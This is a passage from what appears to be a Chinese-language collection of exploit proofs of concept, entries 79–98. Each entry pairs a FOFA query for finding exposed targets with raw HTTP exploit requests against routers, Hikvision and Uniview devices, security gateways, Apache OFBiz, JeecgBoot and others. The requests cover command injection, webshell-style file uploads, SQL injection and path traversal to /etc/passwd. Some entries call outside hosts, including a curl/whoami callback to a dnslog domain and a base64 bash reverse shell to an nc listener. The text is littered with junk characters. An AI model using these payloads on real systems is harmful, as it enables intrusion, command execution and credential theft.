7 W. F6 [) v$ q$ Y+ yGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
8 a3 J( b6 L$ z% u HHost: x.x.x.x; |$ } ]# e8 Y( t2 j8 D% k
2 j- T" z8 m4 c$ t+ s$ }5 b
- W8 Y& F( @$ |# J2 }" L79. BYTEVALUE 百为流控路由器远程命令执行
+ h- R6 B+ A0 L/ L" MFOFA:BYTEVALUE 智能流控路由器; f" N( e# \# j6 T3 ?
GET /goform/webRead/open/?path=|id HTTP/1.1
# `# |# p$ Y( s$ n3 X1 DHost:IP
c- t: I5 Y" L/ v. w$ y+ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
# ^1 s5 y, |6 G3 I$ m% F4 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 ~% B8 m# C5 A- a5 ^. }7 S. u: k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! h5 U! [+ v3 S% yAccept-Encoding: gzip, deflate, t; U7 x% N2 Y& f* { Y3 F
Connection: close4 N0 K5 L4 e$ C7 J* P
Upgrade-Insecure-Requests: 1
9 W% E" V2 u1 b u/ ?5 @0 V1 g7 A: c4 q8 b1 Y( d$ ~
5 B$ R/ w/ V ]4 o; v9 _. A
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传& ~8 K% u; z9 P5 R! A
FOFA:app="速达软件-公司产品"
) [2 F* ~4 ?9 MPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
& X7 x. E2 r' XHost: x.x.x.x
- f) y/ ?3 a) e7 g" g& l0 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ n0 s2 g9 J$ g. R3 d1 h
Content-Length: 279 Q2 t# l; u% D# ` G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! i4 u* d; _5 ^1 r& x
Accept-Encoding: gzip, deflate7 p- k$ G0 ^, L% x) f4 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, j/ I! X% I1 w3 wConnection: close
$ F$ `) U# {8 d- I( Z1 WContent-Type: application/octet-stream
~+ L' h/ e, J( A* g" ^* |Upgrade-Insecure-Requests: 1
( i7 ]" X) k4 A7 g
, e) S; b! Q* Z* m! l! ?2 k<% out.print("oessqeonylzaf");%>
* t* v9 N; i: A1 B. u
, Y' j s3 \4 z2 E7 T: P- L# N9 l Q; J
GET /xykqmfxpoas.jsp HTTP/1.1- X! E+ v5 Z; n9 Y
Host: x.x.x.x
3 X" V; D. M5 G) t5 s. WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 h& e1 c1 u3 W! D. x. y( g9 FConnection: close, _2 T3 P4 l) Z0 y. t3 U. h8 ~* B
Accept-Encoding: gzip+ y1 }: `3 K: |
7 T+ J) w9 V3 R+ w$ K& {5 N9 ~! N& b% O" D0 Z3 L- E0 X
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
6 |) V9 l. Y0 h% e. r- |2 j& o- cFOFA:app="uniview-视频监控"
# `- c6 [. ^& J9 @0 i# M. z9 D; K2 kGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
# M, B% T7 }# y3 Q( z( }+ [% e2 dHost: x.x.x.x
/ Q# r+ ^7 \( e- cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 ?4 B; _+ ]1 v) \$ dConnection: close# h- u7 a( @+ P3 y5 ^; p+ m8 \- _
Accept-Encoding: gzip
# f, W$ ]8 j% e* Y/ s4 O8 }( `: d5 R
. ?2 r0 v E+ N
& P( i& W o+ E( v: O$ Z1 l" t, ^82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行5 o9 S6 u F. J3 z: O% ~/ I/ N
FOFA:app="思福迪-LOGBASE"
! S, n$ U0 T0 F$ _9 m' D, @POST /bhost/test_qrcode_b HTTP/1.1
1 U6 X! \) k9 Y1 SHost: BaseURL
5 U! u3 l0 u$ Z2 HUser-Agent: Go-http-client/1.1
1 e$ F8 L2 e- }Content-Length: 23# u! _% ^' b4 m" W e) a3 I
Accept-Encoding: gzip
8 c: `* ]" f+ k! K8 M6 iConnection: close
3 @+ K7 P7 Q7 V& s+ ]' Y3 u" PContent-Type: application/x-www-form-urlencoded% p) _2 l: d( i
Referer: BaseURL
) c5 {+ `* [( J! d( G+ s' p/ V8 O/ {$ f& f" J' s# b
z1=1&z2="|id;"&z3=bhost' _* G) [$ I5 ~0 M6 n" I
8 _4 k2 d! o: A, B. z; c2 c |" p, @1 d% m( h- g- t1 Z
83. JeecgBoot testConnection 远程命令执行) T- v2 X9 [8 ?+ c
FOFA:title=="JeecgBoot 企业级低代码平台"* v) Q% d* K1 _. e; M: K2 I
" n4 \) h7 v- C6 p
/ T1 A/ R6 N1 @- V( k/ _7 l; f$ _POST /jmreport/testConnection HTTP/1.1
1 \9 A. o% P. N6 ^( yHost: x.x.x.x3 w( s% S/ i+ Y( b* v2 Q5 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ s" t: }- e$ EConnection: close4 r2 C$ s1 S3 u' c$ [
Content-Length: 8881& G! T0 J# G6 n3 f( G( U z
Accept-Encoding: gzip" a" h- ~/ ]4 R7 A4 O, ~4 {8 p
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
\1 |4 |; f- S0 [2 bContent-Type: application/json3 b# N( x. d0 P0 K7 q: X5 j# c, w
( q; n) J# B' ZPAYLOAD
0 z: Q' X% P4 u) l& h8 H4 X: O
/ n: K0 O9 {8 e84. Jeecg-Boot JimuReport queryFieldBySql 模板注入+ l2 |$ ^# I% x0 C6 R
FOFA:title=="JeecgBoot 企业级低代码平台"# r1 D% B \% o b: A$ u
# h* l0 D$ I, C. r
7 ]1 b6 }5 j9 m: L( q& j' H
. ~$ O; B3 G' N3 @% k4 V
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.16 g8 i3 p; k& F& G: V
Host: 192.168.40.130:8080
& `+ ] N) V% @" u7 f+ RUser-Agent: curl/7.88.19 X- }" S# Q* H" R; G9 P' s& n
Content-Length: 156
5 y ?3 N$ j- g# EAccept: */*4 D- M& l. U* Q& f0 i/ q
Connection: close
# W/ ]& g: p$ k% ^% UContent-Type: application/json
7 u4 _5 z) V+ O) A4 C! k# ?Accept-Encoding: gzip8 A- [% \9 @: T; b0 J3 K, {
! ~; s" b( ~5 Z& B: t v& _/ ?
{" q0 _: z; Q% {) F' `- _
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",$ i+ D6 `9 Y) a& } l/ @
"type": "0"
5 B& D( j; Y) X m5 a}
8 p2 x/ _7 Q6 `* U- q* f% e4 d3 H$ B, v2 W1 O
3 ~. V" n, D9 ~0 u7 S+ J. F) y3 w85. SysAid On-premise< 23.3.36远程代码执行
. {- V1 w# g* vCVE-2023-47246
" Y1 V1 x/ G8 zFOFA:body="sysaid-logo-dark-green.png" 3 ]- G4 s; L% {
EXP数据包如下,注入哥斯拉马1 U1 Y7 C: S5 Q# S
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
% g- z: Z& X4 j; EHost: x.x.x.x
- i2 V, S0 r3 E7 {5 O" |0 @4 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: C" J7 R( I8 s5 M
Content-Type: application/octet-stream6 {6 r' c" O0 F' w) e
Accept-Encoding: gzip7 z" _1 ?2 U8 m% e; x6 j! I
i8 s7 ?3 Y- f: q' N4 [PAYLOAD
' v7 t% F2 y9 O% G( w# G( E9 |1 i- Q7 x4 B; G3 }& f
回显URL:http://x.x.x.x/userfiles/index.jsp
) X, E8 T* c/ g6 z# z5 `( Z) D7 R+ i
86. 日本tosei自助洗衣机RCE" F: u; B* u: ^
FOFA:body="tosei_login_check.php"; }2 |) C( R+ {* i1 L
POST /cgi-bin/network_test.php HTTP/1.1
3 I! G2 u4 p( ?+ wHost: x.x.x.x. d8 d- s: x. J# O+ g$ j) \8 d2 K5 x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.360 y- P# n+ {$ y
Connection: close
) M0 {" R' k8 `Content-Length: 44
. T6 y5 c5 A% S$ `* A& i n3 V! _: IAccept: */*. K. u1 @8 w3 T- r, g+ Z9 h
Accept-Encoding: gzip/ I! E7 j3 b3 i0 _. }
Accept-Language: en
y* K' _/ o. @Content-Type: application/x-www-form-urlencoded
9 u% c# h( `7 p2 q! v. Y- k# G" m* P- \4 U* M# Q
host=%0acat${IFS}/etc/passwd%0a&command=ping" a$ t3 @( ~% v( D& M9 q* e
; o B. d# `) A8 ^; c& g3 J( d
8 ^5 b% A4 V9 C2 o x87. 安恒明御安全网关aaa_local_web_preview文件上传
, O3 q5 K+ S3 d- M) L! qFOFA:title="明御安全网关"4 t7 F) a5 ~- K# H+ [
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1! g- g3 W g9 z8 }% N8 @
Host: X.X.X.X
: o# M6 h5 o6 E* D9 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- N/ W: ]' `% g0 h; UConnection: close
; m. `3 C4 I6 |9 Q& ]Content-Length: 198
+ X+ _6 E0 E% `7 n8 g/ KAccept-Encoding: gzip$ D v6 k, k+ n. l( u( `% }
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
& j/ K# t+ A, m/ w; S/ P" J9 _+ n5 i
--qqobiandqgawlxodfiisporjwravxtvd5 m- N3 y7 T6 M
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"1 U1 O9 ~9 P( ?/ R: K( G7 }0 S
Content-Type: text/plain
: X. w+ k _' e8 R' Z. @2 H1 D
: v' r s1 |5 m7 C9 j7 E6 Z3 n2ZqGNnsjzzU2GBBPyd8AIA7QlDq" m4 R% m7 X) @" X3 i: I4 `
--qqobiandqgawlxodfiisporjwravxtvd--3 }" G {0 z5 _% q. E5 ]
! K4 W" J f, M8 z
[) p& _7 w0 }4 f: a
/jfhatuwe.php
: M; B9 e- k# @: R' I9 I/ S3 @; Q* y0 P
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 C! _. |- V) z) Q' ]5 {4 H1 lFOFA:title="明御安全网关"" k8 y; y5 F; O# R, e! f0 p
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.12 L8 t5 R+ v2 j5 w# M& s9 Q
Host: x.x.x.xx.x.x.x
/ y( E( V* U" t# N0 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. l5 @& o+ X% \! sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 s# d5 e0 h) T* tAccept-Encoding: gzip, deflate
f9 [7 a! d7 {: OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 }/ p* g( C4 V# l5 X8 V
Connection: close
2 p3 u- u0 k, v5 \# r. L5 k- A% K. n3 R% Q% i3 [* G- u H
1 E1 b. ?0 Y/ D' ]/astdfkhl.php3 W! @ h a' J1 B! v7 o
/ Y: j6 T; I: A0 U! t* T89. 致远互联FE协作办公平台editflow_manager存在sql注入5 w% z, k. n3 O% Q4 e
FOFA:title="FE协作办公平台" || body="li_plugins_download"
; U1 t! `' J" u" t7 V; _POST /sysform/003/editflow_manager.js%70 HTTP/1.1
$ `6 t! e6 E" k$ lHost: x.x.x.x
9 X, | ~- G9 S5 Q, h$ q; W, j# q& GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# S: r% G0 J/ E- c
Connection: close
+ d7 h' }$ Y( w sContent-Length: 41) h, _. m( x# U" I/ ~* d8 e
Content-Type: application/x-www-form-urlencoded
6 K! ^3 r0 r( @' k* Q9 q6 zAccept-Encoding: gzip
, E, q& C* P. W: h% M! _ S3 q( c$ {4 l
option=2&GUID=-1'+union+select+111*222--+& \( u- I$ w' S9 P* Q2 d
5 w. r1 t$ D8 b! R
7 q6 e! |- c3 S2 l
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行/ v L5 l$ y, b! [
FOFA:icon_hash="-1830859634"& |0 r& x7 I" l
POST /php/ping.php HTTP/1.1/ @+ A& G4 w: a- Z( U
Host: x.x.x.x
. I+ q+ V, G- |; `- iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
5 h) A0 v6 s6 _2 e T( _6 ZContent-Length: 51
, s3 w: h6 @2 |Accept: application/json, text/javascript, */*; q=0.01
! S3 _/ s: A, J, I" @. E0 pAccept-Encoding: gzip, deflate( \' k/ K' e+ o1 f; q8 b- r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 W* r* G, T+ t7 O1 o7 y; w- G/ EConnection: close) x6 p2 { P# F
Content-Type: application/x-www-form-urlencoded9 w8 Y2 r6 D6 t' D7 k
X-Requested-With: XMLHttpRequest
2 q, e/ L* l2 y
5 b% E7 V) k8 K9 x; ~' x4 Ujsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig8 T: ]5 k) n2 `5 h6 T$ J
- n `* \* s8 [9 N: Z
0 c3 m }) ~( w+ J l' x3 A3 x: s4 x
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取- M4 V2 I3 Q7 i9 Q7 J ^0 c6 }3 Q
FOFA:title="综合安防管理平台"0 u+ k; ?# D0 q; Q
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
% O; d' }3 f$ Y4 RHost: your-ip# y0 k! F! r$ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
V; y$ p$ i, R) R/ n" @Accept-Encoding: gzip, deflate
1 k7 f. j% J% N* [+ y5 t: a0 dAccept: */*
& R' ]$ A4 R5 L- ~Connection: keep-alive# w- A2 l1 p0 P
7 z( r# f: }! N
' N& X1 G/ S7 g5 g' s6 Q5 q" I! G7 a& D1 J7 v# [
92. 海康威视运行管理中心session命令执行
/ U4 j7 J7 B6 |* B# QFastjson命令执行
" I+ Z7 g- u. ~* p9 c) rhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
9 X3 b7 H& D3 W3 XPOST /center/api/session HTTP/1.1
' I/ g. _) L" F' R( s" D4 ~Host:
& m+ q% x! o0 i- A5 I! xAccept: application/json, text/plain, */** t8 a. G! C. S* v/ {( N/ D
Accept-Encoding: gzip, deflate
7 a; K* s4 X$ ^. }X-Requested-With: XMLHttpRequest
: r# t9 h5 X# C- J' j uContent-Type: application/json;charset=UTF-8
g' N! v& {6 \* C8 c* N& ]X-Language-Type: zh_CN
; Y' M X. E0 iTestcmd: echo test$ b5 v1 ~0 q6 R. o/ i0 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36* y4 J. ]" a: q) j6 v4 H5 k: G
Accept-Language: zh-CN,zh;q=0.9
/ d7 u9 |/ C% P9 ?: j$ q* `/ RContent-Length: 57780 \, y7 s* y! D2 S1 P* }
0 N, m& M" z% j8 j8 Z9 P: I$ C
PAYLOAD) n G. m& E! @- m6 l; Z
3 b) l6 u j; H, x7 F8 v
* A3 ?% }8 H6 L/ W+ v, o93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传8 s9 P7 W( }2 n4 e
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="8 S0 r! D2 h/ n s$ ^! u
POST /?g=app_av_import_save HTTP/1.1
/ S9 T& H w* F9 XHost: x.x.x.x
6 d) C/ {9 }5 P3 iContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx, ~2 x! u( `. x9 e- X: _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ s- b+ Q/ r' c+ _! D6 T. U1 p+ w5 _: b& O# P
* h8 E* z) x% ?8 B
------WebKitFormBoundarykcbkgdfx
9 X, k+ U( H9 P7 |5 [Content-Disposition: form-data; name="MAX_FILE_SIZE"/ ? Q2 W: n8 R+ m
; ~* c% x& s, b* I! I6 `
10000000
8 o+ g k4 E) O/ v* V5 @------WebKitFormBoundarykcbkgdfx
! x$ D; l# S) a7 u! l4 JContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
( }( v6 H1 E6 \* C: xContent-Type: text/plain U. p% d- o, I* | q
/ h8 b! D) T J2 ]2 T
wagletqrkwrddkthtulxsqrphulnknxa
* W* D1 T- s/ K' U1 Y------WebKitFormBoundarykcbkgdfx
5 P& k- X! s% _! a. S3 iContent-Disposition: form-data; name="submit_post"# Q4 A P. U5 M" O: S( N& r" j
* j" K9 X9 k4 o& O, K+ ~# y& b
obj_app_upfile3 Y$ C/ _/ o) `" V: f
------WebKitFormBoundarykcbkgdfx0 e7 B' h% o! K; X! L1 B
Content-Disposition: form-data; name="__hash__"+ U. {1 r" ^4 t- R$ L+ B. f
7 C1 V5 j. e+ W& A- b6 D4 E0b9d6b1ab7479ab69d9f71b05e0e9445
4 p8 x/ k% t$ T# P------WebKitFormBoundarykcbkgdfx--6 E0 V! R+ Y) Y. C2 W$ }. Y
9 X6 w( ~; }9 M/ N7 |
$ f6 K9 k+ I8 T2 F0 O: `GET /attachements/xlskxknxa.txt HTTP/1.11 A' Q0 W- J/ V0 Y, E
Host: xx.xx.xx.xx/ z% h2 i" z+ E6 W |
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& B+ T! G; T% S$ W3 D6 ^+ a! M0 v( v
+ I$ _3 o. {. I T1 d7 l/ A& b2 }
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传# k! j' K9 r! j, S4 K+ s
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
' m# A7 _( Q" U0 |POST /?g=obj_area_import_save HTTP/1.1' j7 l9 m* [ M8 d4 [4 b
Host: x.x.x.x
( M) I, p7 i4 P( m: kContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
% ^" U; }* R$ A: q: ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 _2 d) u/ k- u2 x- [- D. { Z' {# Q
/ |) \7 k4 L1 K' C" ~$ ^* q2 s8 [------WebKitFormBoundarybqvzqvmt
; {6 P* ?9 ~7 C: dContent-Disposition: form-data; name="MAX_FILE_SIZE"' \3 N' f ~* ]7 g4 L- c/ V6 |
9 D* z* s8 o# S' _10000000* e* R5 j8 m. b; N4 ~$ H
------WebKitFormBoundarybqvzqvmt/ x; t9 Y8 X- q: q
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
' m% P: d% a7 {0 |# sContent-Type: text/plain$ u) L2 i7 [' l* J1 j) m0 C9 y
1 Y+ v: ^6 {* |4 l
pxplitttsrjnyoafavcajwkvhxindhmu- U5 `+ C4 ?# l- E2 N# G ^6 {3 ?2 U
------WebKitFormBoundarybqvzqvmt. P3 I( |8 A G! ]& A+ X P ^
Content-Disposition: form-data; name="submit_post"& @8 P. }! F2 F: x( F' C
1 e) a `* z4 X/ ^1 b$ ~2 Z4 \obj_app_upfile
' z" z0 E0 \' p4 K# V------WebKitFormBoundarybqvzqvmt
- Z$ g! {2 K- }. @Content-Disposition: form-data; name="__hash__"" C" p; L% E5 _" k2 a
2 V( F: u- B6 t. u: n
0b9d6b1ab7479ab69d9f71b05e0e9445
7 Q0 t1 q: z T4 l j0 n, G------WebKitFormBoundarybqvzqvmt--% f$ e4 z% `( }& \' g/ ~, [
* t3 x9 I1 Z' F* t
" K+ N1 n5 T, W2 W1 Z7 ^4 c" K4 s: U1 B
GET /attachements/xlskxknxa.txt HTTP/1.1
$ B7 K, w0 T& h* J2 a1 MHost: xx.xx.xx.xx
: t9 ], n( `: R* K7 aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. w) x3 G$ K# G$ g
2 T3 H' q$ `2 u0 [ D
; ~% J0 z$ C9 K9 N/ L2 S6 y' X5 I" q6 u5 [4 s
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行% Y7 I( f% `* G* f9 e# y, _
CVE-2023-49070
3 B3 h/ c* H+ E7 ^FOFA:app="Apache_OFBiz"
9 r' B# ]2 f# D# i; h7 ]2 h) IPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
4 M) O) e( Y- G! {5 P, A- gHost: x.x.x.x# I* }! V& w( W5 r0 x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.361 V+ @/ Q+ O3 g' Y/ k4 ]) K
Connection: close
2 S* ]# R2 u* \! R) c1 cContent-Length: 889 D/ C) c/ Z$ ^* G8 o
Content-Type: application/xml8 T! ~. E9 L" Z3 T1 p( I4 z
Accept-Encoding: gzip
( |- H6 y% J( `! [
; n8 t+ ^! A5 s% }<?xml version="1.0"?>
6 Q$ J; J$ e' ~+ F<methodCall>
" o, `5 D# o+ ~ G <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
A; y$ t9 t6 {( n$ u/ u( C <params>
0 l- a& {* m0 ?1 l* J. H/ m <param>; {. A, a" [4 A1 r( v6 e( D' U4 D2 Q
<value>
6 ?& p+ j- P4 F3 h; X# r <struct>
$ R; ^7 F4 t. U" E <member>
/ e+ h3 n* s# w+ P r6 P0 a7 E <name>test</name>9 i- f( H9 R' |) E
<value>! t5 W- K- n0 k- x/ N+ a
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>, m j6 J8 @! x6 K# A8 N/ r
</value>$ ~ W) g7 V# K8 m
</member>* C; s/ o/ P) N, _) E% V
</struct>& x5 n5 L/ J7 d( c
</value>
( Y& Q" j: R. O- k# l+ D) d+ S; m </param>3 P: s" g) \2 }2 }. `9 l
</params>1 q0 Y0 e' e: M& A
</methodCall>" c1 B7 T5 d, `3 K# B3 {( r
% M$ B" \9 W( b5 H$ {; q3 E" S/ Y. t; z$ O2 \# \7 a' b% o
用ysoserial生成payload
0 l5 _# U7 x4 V: E5 Y8 kjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"* `9 N, Q2 i4 S: h- A
$ s. \2 X, u) ^; G4 y
! M9 V! A' B* R9 H8 j9 i K" X将生成的payload替换到上面的POC6 s: e* r1 b, o( u5 `5 E# \9 S
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.10 t( J6 [7 Q* d! Y
Host: 192.168.40.130:8443
' n% l- f' ?% y- vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+ Z9 T% _& y, N; Q3 D7 s6 s. oConnection: close7 z$ g+ \. D% O$ S" U1 F7 {
Content-Length: 889* S2 Z7 W" u3 D9 B
Content-Type: application/xml$ x- w. O- U/ u+ q; \ P% I
Accept-Encoding: gzip
, d7 J3 G' J" v8 e/ |0 J$ f% y) v& E( R! w" h' A$ G; G8 S
PAYLOAD% ]' N: ~ o$ |( L, f& B# R) U
) }6 z: g( [: k6 E96. Apache OFBiz 18.12.11 groovy 远程代码执行
4 d. D1 W: B7 F3 h/ b/ x2 wFOFA:app="Apache_OFBiz"9 F. A0 Z T; Y
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1+ G. M* h' k v7 e3 `9 D9 r
Host: localhost:8443; N% l. }; c4 ]3 i2 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 H5 o7 U6 x; jAccept: */*
3 r( v2 s9 b. P$ L9 v& _: m' kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 o% p. }/ H4 h+ h: z
Content-Type: application/x-www-form-urlencoded2 a( ]2 c) h# O) h6 o, T* i
Content-Length: 55
% g2 ?! a7 J+ U# g! }; i1 k4 A' \. H+ S' {& F; C- T
groovyProgram=throw+new+Exception('id'.execute().text);
D) T5 i' F' E" K0 ^2 L4 `( z$ C ^( D! X
4 M' A! {6 Y. o/ H' ]( z9 h( O反弹shell9 H! p2 l: M9 l# h9 L0 |
在kali上启动一个监听+ D) Y/ |) O; |
nc -lvp 7777
+ R5 [* t3 u1 f+ z( y5 ^$ k$ U$ k: K6 L( u, S$ m4 ?' d7 l: Z/ h
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1/ O" h$ a+ L" a, w3 E1 v& ~$ B6 F4 v
Host: 192.168.40.130:8443
2 a3 v8 s! j y! k& g: z) l2 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ j8 `8 r K! J
Accept: */*
, g+ {, Q" u* A1 k9 kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" F0 k' _$ I" y+ E4 B, ]
Content-Type: application/x-www-form-urlencoded
- g& f+ v% D" h9 U9 ]Content-Length: 711 G8 E! n+ r% c$ a5 r# S
# b7 D7 n7 l3 g- L! x
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();6 _$ v! h: F! j9 c2 v1 A) n$ A
N& K) `8 y8 ~+ g& T+ J2 ?0 U97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行! t& c0 t# ]9 f" X2 _7 N
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"" e1 I% F8 F+ n6 |! \2 a9 ^# ?
GET /passport/login/ HTTP/1.1$ p" b6 [8 t6 o3 Z* {5 B
Host: 192.168.40.130:80851 s( G0 c. p4 D5 s' @$ ?7 P' P3 A+ v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 b$ G7 K9 L; b
Accept-Encoding: gzip; y! l4 _2 I9 C
Connection: close
. F, s# `5 n I8 n. p# hCookie: rememberMe=PAYLOAD: m& ~6 t5 r8 q
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
& P6 w( q# \$ Y5 F: _6 X7 J8 z( w* v6 u
0 q( k! x' o7 j X" x( w2 y98. SpiderFlow爬虫平台远程命令执行: ^- e' S) j# L5 a, u" i
CVE-2024-0195% b+ X6 U3 T, y4 E, m9 d! d+ e
FOFA:app="SpiderFlow"
7 l u% x+ g% _/ M0 [7 ZPOST /function/save HTTP/1.1
! c3 j- P& A! THost: 192.168.40.130:8088" c T/ w% U0 Z4 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- U! }/ t7 O5 f8 w+ @& G, G
Connection: close
v' T$ {8 r* l8 ]- \# k# BContent-Length: 121
W7 ~* ] B& @, a5 NAccept: */*
3 }' ~9 a3 W2 @0 Y# OAccept-Encoding: gzip, deflate
# i2 v, W# p9 w/ f w3 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 s! O. P- K" H7 K+ `, B4 k+ Q
Content-Type: application/x-www-form-urlencoded; charset=UTF-8# Q6 O# G! q" w" [' {
